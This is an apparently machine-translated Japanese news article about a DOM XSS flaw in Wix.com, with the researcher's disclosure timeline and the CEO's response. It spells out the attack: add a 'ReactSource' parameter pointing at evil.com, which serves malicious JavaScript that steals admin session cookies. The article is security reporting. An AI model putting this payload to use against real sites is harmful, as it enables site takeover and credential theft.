Wixについて聞いたことがありますか(.)com?
Wix.comは、ユーザーが会社のオンラインドラッグアンドドロップツールを使用してHTML5Webサイトとモバイルサイトを構築するために設計されたクラウドベースのWeb開発プラットフォームです。.
不運にも, 深刻なXSSバグがプラットフォームで発見され、現在何百万ものWebサイトとユーザーを危険にさらしています.
Wix(.)comには深刻なXSSバグがあります, 研究者は言う
セキュリティ研究者によって報告されたように, このサービスは何百万ものウェブサイトをホストしています 87 百万人の登録ユーザー. 怖いのは、現在すべてのユーザーがこのXSSの脆弱性に陥りやすいことです。. 後者は、攻撃者がワームのように展開して管理者アカウントを乗っ取る可能性があります. これが行われると, 攻撃者は、侵害されたWebサイトを完全に制御できます。.
XSSの脆弱性は、ContrastSecurityのMattAustinによって開示されました。. 彼 書きました:
Wix.comには深刻なDOMXSSの脆弱性があり、攻撃者はWixでホストされているWebサイトを完全に制御できます。. Wixで作成されたサイトに単一のパラメータを追加するだけです, 攻撃者は、JavaScriptをロードして、ターゲットWebサイトの一部として実行させることができます。.
バグを引き起こすには、単純なコード行で十分です
攻撃は、wixから任意のURLに単純なリダイレクトコマンドを追加することによってのみトリガーできます(.)com. 結果は悪意のあるJavaScripにリダイレクトされます. 以下の例を参照してください:
- 追加: ?ReactSource = https://evil.comからwix.comで作成された任意のサイトの任意のURL.
- evil.comが/packages-bin/wixCodeInit/wixCodeInit.min.jsで悪意のあるファイルをホストしていることを確認してください
これらの単純なコード行は、攻撃者がJSが標的のWebサイトの一部としてロードおよびアクティブ化されていることを確認するのに十分です。, 研究者は説明します. 攻撃者は、管理セッションのCookieとリソースにアクセスすることもできます, 確かに非常に悪いシナリオ. セッションCookieが収集されるときはいつでも, 攻撃者はDOMXSSをiframeに自由に配置できます. これは、オペレーターが管理するWebサイトで悪意のあるコンテンツをホストするために行われます。.
成功すると, この攻撃はマルウェアの配布に利用できます, ウェブサイトの変更, 暗号通貨マイニング, アカウントの資格情報の変更, 等.
Wixは何と言いましたか?
wixとのコミュニケーションも(.)com, 研究者は以下の経験を共有しています:
10月 10: セキュリティ連絡先を要求するサポートチケットを作成します
10月 11: セキュリティ担当者を見つけるには、Twitterで@wixに連絡してください. 標準サポートを使用するように返信しました. 作成したチケットに詳細を記載. チケットページは機能しなくなりました. https://www.wix.com/support/html5/contact.
10月 14: Wixから「問題を調査しており、できるだけ早くフォローアップします」という標準の返信を受け取りました.
10月 20: 更新を要求するチケットに返信する. (応答なし)
10月 27: 更新の2番目の要求. (応答なし)
10月に 28, 研究者はついに、次のような回答を受け取りました。
連絡しようとしたグループ (安全) 存在しない可能性があります, または、グループにメッセージを投稿する権限がない可能性があります.
それにもかかわらず, Wix Avishai AbrahamiのCEOは、プラットフォームの特定の側面がWordPressオープンソースライブラリに基づいていることを最終的に認めました. 彼は、改善されたものはすべてコミュニティにリリースされたと主張しています, ZDNetレポート.